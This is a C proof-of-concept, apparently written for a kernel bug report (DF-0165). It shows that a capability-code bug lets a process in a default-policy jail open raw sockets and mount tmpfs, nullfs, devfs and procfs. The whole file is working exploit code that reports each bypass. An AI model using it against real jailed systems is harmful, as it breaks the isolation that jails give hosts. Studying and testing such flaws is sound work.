/*
 * DF-0165 - caps_priv_check cap-corruption -> jail policy bypass.
 *
 * Run as root on the host. Creates a jail with the DEFAULT policy
 * (allow_raw_sockets=0, vfs_mount_nullfs=0, vfs_mount_tmpfs=0,
 *  vfs_mount_devfs=0, vfs_mount_procfs=0), attaches to it via jail(2),
 * then attempts the cap-gated actions inside the jail.
 *
 * Mechanism (confirmed in sys/kern/kern_caps.c:333-340):
 *
 *   res = caps_check_cred(cred, cap);
 *   if (cap & __SYSCAP_GROUP_MASK) {
 *       cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; <-- BUG
 *       res |= caps_check_cred(cred, cap);
 *   }
 *   if (res & __SYSCAP_SELF) return EPERM;
 *   return (prison_priv_check(cred, cap));                <-- WRONG cap
 *
 * For cap = SYSCAP_NONET_RAW     = 0x61:  cap becomes 0x6  = SYSCAP_NONET
 * For cap = SYSCAP_NOMOUNT_NULLFS= 0xA0:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_TMPFS = 0xA2:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_DEVFS = 0xA1:  cap becomes 0xA  = SYSCAP_NOMOUNT
 * For cap = SYSCAP_NOMOUNT_PROCFS= 0xA5:  cap becomes 0xA  = SYSCAP_NOMOUNT
 *
 * In prison_priv_check (sys/kern/kern_jail.c:865-878):
 *     case SYSCAP_NONET:    return 0;   <-- allowed in jail
 *     case SYSCAP_NOMOUNT:  return 0;   <-- allowed in jail
 *
 * The per-capability switch cases that SHOULD have been hit:
 *     case SYSCAP_NONET_RAW:    check PRISON_CAP_NET_RAW_SOCKETS (line 919)
 *     case SYSCAP_NOMOUNT_NULLFS: check PRISON_CAP_VFS_MOUNT_NULLFS (951)
 *     ... etc.
 * are NEVER reached on the caps_priv_check() path.
 *
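 * Output: a short report per action (one line when the action is denied,
 * two lines when it succeeds); "*** BYPASS ***" appears when the per-cap
 * jail policy was bypassed (action succeeded despite policy=0).
 *
 * Exit status: 0 if at least one action bypassed the policy, 1 if none
 * did, 2 if jail(2) itself failed.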
 *
 * On a FIXED kernel every action would fail with EPERM.
 */
#include <sys/param.h>
#include <sys/jail.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/*
 * Match the kernel's struct null_args (sys/vfs/nullfs/null.h).
 *
 * This is the fs-specific argument block handed to mount(2) as `data` for
 * the "null" filesystem type.  Because it is a local mirror of a kernel
 * structure, the member order and types must stay in step with the kernel
 * definition.  main() zero-fills the whole structure and sets only `target`.
 */
struct df_null_args {
    char              *target;   /* source path of the null mount (main() uses /tmp/df0165-src) */
    struct export_args export;   /* not used by this program; left zeroed by main() */
};

/* Number of cap-gated actions that succeeded inside the jail.  Incremented by
 * the try_*() helpers; main() prints it and derives the exit status from it. */
static int bypass_count = 0;

/*
 * Try to open an IPv4 raw socket and report the outcome on stdout.
 *
 * A failure is reported on a single line together with the errno text.
 * A success is reported as a bypass: the descriptor is closed again and
 * bypass_count is incremented.
 */
static void try_raw_socket_v4(void)
{
    const int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

    if (fd < 0) {
        /* Capture errno once so both format arguments agree. */
        const int err = errno;

        printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  -> %s (errno=%d)  -- correctly denied\n",
               strerror(err), err);
        return;
    }

    /* The socket was created even though the jail policy forbids it. */
    printf("  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]\n"
           "      -> OK fd=%d   *** BYPASS ***\n", fd);
    close(fd);
    bypass_count++;
}

/*
 * Attempt one mount(2) call and report the outcome on stdout.
 *
 *   fstype    filesystem type name passed to mount(2)
 *   cap_name  label printed in the report (the capability being exercised)
 *   target    mount point
 *   data      fs-specific argument block, passed to mount(2) unchanged;
 *             callers in this file pass NULL or a struct df_null_args
 *
 * A failed mount is reported on one line with the errno text.  A successful
 * mount is reported as a bypass, counted in bypass_count, and then undone
 * with unmount(2).  If that unmount fails, a warning is written to stderr so
 * a lingering mount does not go unnoticed.
 */
static void try_mount(const char *fstype, const char *cap_name, const char *target,
                      void *data)
{
    if (mount(fstype, target, 0, data) != 0) {
        /* Save errno before any library call gets a chance to change it. */
        const int err = errno;

        printf("  mount(\"%s\", %s)  [%s] -> %s (errno=%d)\n",
               fstype, target, cap_name, strerror(err), err);
        return;
    }

    printf("  mount(\"%s\", %s)  [%s]\n", fstype, target, cap_name);
    printf("      -> OK   *** BYPASS ***\n");
    bypass_count++;

    /* Undo the mount; report instead of silently ignoring a failure. */
    if (unmount(target, 0) != 0) {
        const int err = errno;

        fprintf(stderr, "warning: unmount(%s) failed: %s (errno=%d); mount left in place\n",
                target, strerror(err), err);
    }
}

/*
 * Entry point of the demo.
 *
 * Steps:
 *   1. Create the scratch directories under /tmp and a marker file in the
 *      nullfs source directory.
 *   2. Create a jail rooted at "/" with jail(2), which also places the
 *      calling process inside it.
 *   3. Attempt a raw socket and tmpfs/null/devfs/procfs mounts, each of
 *      which the jail policy is expected to deny.
 *   4. Print how many of those actions succeeded.
 *
 * Returns 0 if at least one action bypassed the policy, 1 if none did,
 * and 2 if jail(2) failed.
 */
int main(void)
{
    static const char *const scratch_dirs[] = {
        "/tmp/df0165-src",
        "/tmp/df0165-mnt-tmpfs",
        "/tmp/df0165-mnt-devfs",
        "/tmp/df0165-mnt-procfs",
        "/tmp/df0165-mnt-nullfs",
    };

    /* Set up directories.  An already existing directory (from an earlier
     * run) is fine; any other failure is worth a warning because the
     * matching mount attempt will then fail for an unrelated reason. */
    for (size_t i = 0; i < sizeof(scratch_dirs) / sizeof(scratch_dirs[0]); i++) {
        if (mkdir(scratch_dirs[i], 0755) != 0 && errno != EEXIST) {
            const int err = errno;

            fprintf(stderr, "warning: mkdir(%s) failed: %s (errno=%d)\n",
                    scratch_dirs[i], strerror(err), err);
        }
    }

    /* Drop a marker file in the nullfs source so host content is
     * identifiable through a null mount.  Note that try_mount() unmounts
     * right away and this program never reads the marker back; it is only
     * useful for manual inspection. */
    FILE *m = fopen("/tmp/df0165-src/marker", "w");
    if (m == NULL) {
        const int err = errno;

        fprintf(stderr, "warning: cannot create marker file: %s (errno=%d)\n",
                strerror(err), err);
    } else {
        int write_failed = (fputs("HOST-CONTENT-VIA-NULLFS-BYPASS", m) == EOF);

        /* fclose() flushes, so a write error may only show up here. */
        if (fclose(m) != 0) {
            write_failed = 1;
        }
        if (write_failed) {
            fprintf(stderr, "warning: cannot write marker file\n");
        }
    }

    /* jail(2) registers the prison AND attaches the calling process
     * (kern_jail_attach at sys/kern/kern_jail.c:227). Default policy
     * has all gated PRISON_CAP_* flags cleared.
     *
     * Zero the whole structure first so no indeterminate bytes are handed
     * to the kernel. */
    struct jail_v0 jv0;
    memset(&jv0, 0, sizeof(jv0));
    jv0.version   = 0;
    jv0.path      = "/";
    jv0.hostname  = "df0165-test";
    jv0.ip_number = inet_addr("127.0.0.2");

    const int jid = jail((struct jail *)&jv0);
    if (jid < 0) {
        const int err = errno;

        fprintf(stderr, "jail() failed: %s (errno=%d)\n", strerror(err), err);
        return 2;
    }
    /* uid_t is not guaranteed to be int; print it as unsigned. */
    fprintf(stderr, "jail() ok: jid=%d  (now jailed as uid=%u)\n",
            jid, (unsigned)getuid());

    printf("=== DF-0165 demo: cap-gated actions inside jail ===\n");
    printf("    (jail default policy: allow_raw_sockets=0,\n");
    printf("     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)\n");

    try_raw_socket_v4();
    try_mount("tmpfs",  "SYSCAP_NOMOUNT_TMPFS",  "/tmp/df0165-mnt-tmpfs",  NULL);

    /* nullfs: kernel's get_fscap() matches fstype "null" (5-byte strncmp),
     * NOT "nullfs" -- so the user-side type name must be the bare "null". */
    {
        struct df_null_args na;

        memset(&na, 0, sizeof(na));
        na.target = (char *)"/tmp/df0165-src";
        try_mount("null", "SYSCAP_NOMOUNT_NULLFS", "/tmp/df0165-mnt-nullfs", &na);
    }
    try_mount("devfs",  "SYSCAP_NOMOUNT_DEVFS",  "/tmp/df0165-mnt-devfs",  NULL);
    try_mount("procfs", "SYSCAP_NOMOUNT_PROCFS", "/tmp/df0165-mnt-procfs", NULL);

    printf("=== end: %d cap-gated action(s) bypassed jail policy ===\n",
           bypass_count);

    /* Exit status 0 means the bypass was demonstrated; 1 means it was not. */
    return bypass_count ? 0 : 1;
}
